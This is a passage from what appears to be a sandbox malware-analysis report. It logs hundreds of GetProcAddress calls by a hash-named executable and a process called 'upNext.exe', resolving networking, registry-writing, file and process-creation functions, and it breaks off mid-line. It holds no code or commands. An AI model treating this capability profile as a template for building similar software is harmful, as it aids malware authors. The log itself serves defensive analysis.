\"GetProcAddress\" with a parameter GetWindowLongA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetClassInfoA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindNextUrlCacheEntryA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindFirstUrlCacheEntryA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetWindowLongA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleIconToCursor (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleCreateFontIndirect (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleCreatePictureIndirect (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleLoadPicture (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleTranslateColor (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrame (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrameIndirect (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005952)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadStringA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStringTypeExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetPrivateProfileStringA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDateFormatA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FormatMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter UnregisterClassA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetWindowTextA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterClassA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PostMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowLongA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetClassInfoA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a 